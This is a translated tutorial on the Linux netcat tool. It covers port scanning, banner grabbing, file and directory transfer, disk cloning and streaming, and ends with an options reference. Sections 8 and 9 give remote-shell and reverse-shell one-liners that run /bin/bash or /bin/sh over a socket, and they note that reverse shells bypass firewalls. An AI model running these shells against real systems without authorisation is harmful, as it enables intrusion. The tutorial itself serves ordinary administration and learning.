netcat is the swiss army knife of networking tools, it can read and write data over the network via TCP and UDP. By combining and redirecting with other tools, you can use it in a variety of ways in your scripts. It's amazing what can be done with the netcat command.
What netcat does is establish a link between two computers and return two streams of data, and what you can do after that is up to your imagination. You can build a server, transfer files, chat with friends, stream media or use it as a standalone client for other protocols.
Below are some examples of using netcat.
[A(172.31.100.7) B(172.31.100.23)]
Linux netcat command example:
1, port scan
Port scanning is often used by system administrators and hackers to discover open ports on some machines and help them identify vulnerabilities in their systems.
1 |
$nc -z -v -n 172.31.100.7 21-25 |
Can run in TCP or UDP mode, the default is TCP, the -u parameter is adjusted to udp.
The z parameter tells netcat to use 0 IO, close the connection immediately after the connection is successful, and do not exchange data (thanks @jxing for the pointer)
The v parameter refers to the use of redundant options (Translator's Note: that is, verbose output)
The n parameter tells netcat not to use DNS reverse lookup for the domain name of the IP address
This command will print all open ports from 21 to 25. A banner is a text, and a banner is a text message sent to you by a service you are connected to. Banner information is very useful when you are trying to identify vulnerabilities or the type and version of a service. However, not all services send banners.
Once you find open ports, you can easily grab their banners using the netcat connection service.
1 |
$ nc -v 172.31.100.7 21 |
The netcat command will connect to open port 21 and print banner information about services running on this port.
Chat Server
If you want to chat with your friends, there are many software and information services available for you. However, if you don't have such a luxury configuration, for example, you are in a computer lab, and all external connections are restricted, how do you communicate with friends who sit in the next room all day? Don't be depressed, netcat provides such a method, you only need to create a chat server, a predetermined port, so that he can contact you.
Server
1 |
$nc -l 1567 |
The netcat command starts a tcp server on port 1567 to which all standard output and input will be output. Both output and input are displayed in this shell.
Client
1 |
$nc 172.31.100.7 1567 |
Whatever you type on machine B will appear on machine A.
3. File transfer
Most of the time, we are trying to transfer files over the network or other tools. There are many methods, such as FTP, SCP, SMB, etc., but when you just need to transfer files temporarily or once, it is really worth wasting time to install and configure a software on your machine. Suppose, you want to pass a file file.txt from A to B. Either A or B can be used as a server or a client. Hereinafter, let A be the server and B be the client.
Server
1 |
$nc -l 1567 < file.txt |
Client
1 |
$nc -n 172.31.100.7 1567 > file.txt |
Here we create a server on A and redirect the input of netcat to file file.txt, then when any successful connection to this port, netcat will send the file content of file. On the client side we redirect the output to file.txt, when B connects to A, A sends the file content, and B saves the file content to file.txt.
There is no need to create a file source as a Server, we can also use it in the opposite way. Like below we send a file from B to A, but the server is created on A, this time we just need to redirect the output of netcat and redirect the input file of B.
B as Server
Server
1 |
$nc -l 1567 > file.txt |
Client
1 |
nc 172.31.100.23 1567 < file.txt |
4. Directory transfer
Sending a file is easy, but if we want to send multiple files, or an entire directory, it's just as easy, just use the compression tool tar, compress and send the compressed package.
If you want to transfer a directory from A to B over the network.
Server
1 |
$tar -cvf – dir_name | nc -l 1567 |
Client
1 |
$nc -n 172.31.100.7 1567 | tar -xvf - |
Here on the A server, we create a tar archive and redirect it via - in the console, then using a pipe, redirect to netcat, which can send it over the network.
On the client side we download the tarball through the netcat pipe and then open the file.
If we want to save bandwidth and transmit compressed packages, we can use bzip2 or other tools to compress.
Server
1 |
$tar -cvf – dir_name| bzip2 -z | nc -l 1567 |
Compressed by bzip2
Client
1 |
$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf - |
Unzip with bzip2
5. Encrypt the data you send over the network
If you are concerned about the security of the data you send over the network, you can encrypt your data with a tool like mcrypt before sending it.
Server
1 |
$nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt |
Encrypt data using mcrypt tool.
client
1 |
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567 |
Decrypt the data using the mcrypt tool. The above two commands will prompt for a password, make sure both ends use the same password.
Here we use mcrypt for encryption, and any other encryption tool can be used.
6. Streaming Video
While not the best way to generate streaming video, if there is no specific tool on the server, using netcat, there is still hope that we can do it.
Server
1 |
$cat video.avi | nc -l 1567 |
Here we are just reading in from a video file and redirecting the output to the netcat client
1 |
$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 - |
Here we read data from socket and redirect to mplayer.
7. Clone a device
If you have already installed and configured a Linux machine and need to repeat the same operation for other machines, and you do not want to repeat the configuration again. Instead of having to repeat the process of configuring the installation, just boot some boot from another machine to pen drive and clone your machine.
Cloning a Linux PC is easy, assuming your system is on disk /dev/sda
Server
1 |
$dd if=/dev/sda | nc -l 1567 |
Client
1 |
$nc -n 172.31.100.7 1567 | dd of=/dev/sda |
dd is a tool that reads raw data from disk, I redirect its output stream to other machines through netcat server and write to disk, it will copy all the information along with the partition table. But if we have already done partitioning and only need to clone the root partition, we can change sda to sda1, sda2, etc. depending on the location of our system root partition.
8. Open a shell
We have used remote shells - using telnet and ssh, but if those two commands are not installed and we don't have permission to install them, we can also use netcat to create a remote shell.
Assuming your netcat supports -c -e parameters (default netcat)
Server
1 |
$nc -l 1567 -e /bin/bash -i |
Client
1 |
$nc 172.31.100.7 1567 |
Here we have created a netcat server and said execute /bin/bash when it connects successfully
If netcat does not support -c or -e parameters (openbsd netcat), we can still create remote shells
Server
1 |
$mkfifo /tmp/tmp_fifo |
2 |
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo |
Here we create a fifo file and then pipe the contents of the fifo file to shell 2>&1. is used to redirect standard error output and standard output, and then pipe to port 1567 where netcat is running. So far, we have redirected the output of netcat to the fifo file.
illustrate:
The input received from the network is written to the fifo file
cat command reads fifo file and sends its content to sh command
The sh command process takes input and writes it back to netcat.
netcat sends output to the client over the network
As for why it succeeds because the pipe makes the command execute in parallel, the fifo file is used to replace the normal file, because the fifo makes the read wait and if it is a normal file, the cat command will end as soon as possible and start reading the empty file.
On the client side simply connect to the server
Client
1 |
$nc -n 172.31.100.7 1567 |
you will get a shell prompt on the client side
9. Reverse shell
A reverse shell is a shell that is opened on the client side. The reverse shell is so named because unlike other configurations, here the server uses a service provided by the client.
Server
1 |
$nc -l 1567 |
On the client side, simply tell netcat to execute a shell when the connection is complete.
client
1 |
$nc 172.31.100.7 1567 -e /bin/bash |
Now, what's so special about reverse shells?
Reverse shells are often used to bypass firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 172.31.100.7 and I use a proxy server to connect to the external network. If I want to access this machine like 1.2.3.4's shell from outside the network, then I would use reverse shell for that purpose.
10. Specify the source port
Assuming your firewall filters all ports except port 25, you need to specify the source port with the -p option.
Service-Terminal
1 |
$nc -l 1567 |
client
1 |
$nc 172.31.100.7 1567 -p 25 |
Use of ports within 1024 requires root privileges.
This command will open port 25 for communication on the client side, otherwise a random port will be used.
11. Specify the source address
Suppose your machine has multiple addresses and you want to explicitly specify which address to use for external data communication. We can specify ip address using -s option in netcat.
Service-Terminal
1 |
$nc -u -l 1567 < file.txt |
client
1 |
$nc -u 172.31.100.7 1567 -s 172.31.100.5 > file.txt |
This command will bind the address 172.31.100.5.
These are just some examples of using netcat.
Other uses are:
- Use the -t option to simulate a Telnet client,
- HTTP client for downloading files,
- Connect to a mail server, check mail using the SMTP protocol,
- Use ffmpeg to take screenshots and share via streaming, etc. Other more uses.
Simply put, as long as you understand the protocol, you can use netcat as a network communication medium to implement various clients.
Reference documentation
English original: Linux Netcat command – The swiss army knife of networking
The nc command is the abbreviation of the netcat command, which is used to configure the router.
grammar
nc/netcat (options) (parameters)
Options
-g<gateway>: Set the router hop communication gateway, up to 8;
-G<number of pointers>: Set the source routing pointer, the value of which is a multiple of 4;
-h: online help; -i<delay in seconds>: set the time interval to transmit information and scan the communication port;
-l: Use monitoring mode to monitor incoming data;
-n: use the ip address directly without going through the domain name server;
-o<output file>: Specify the file name, and dump the transmitted data into this file in hexadecimal characters and save it;
-p <communication port>: Set the communication port used by the local host;
-r: Specifies that both the source port and the destination port are randomly selected;
-s<source address>: Set the IP address of the data packet sent by the local host;
-u: use UDP transport protocol;
-v: Display the instruction execution process;
-w<timeout seconds>: Set the time to wait for connection;
-z: Use 0 input/output mode, only used when scanning communication ports.
parameter
Host: Specify the IP address or host name of the host;
Port number: Can be a single integer or a range.
Original: http://www.oschina.net/translate/linux-netcat-command
From: Linux Netcat Command - The Swiss Army Knife of Network Tools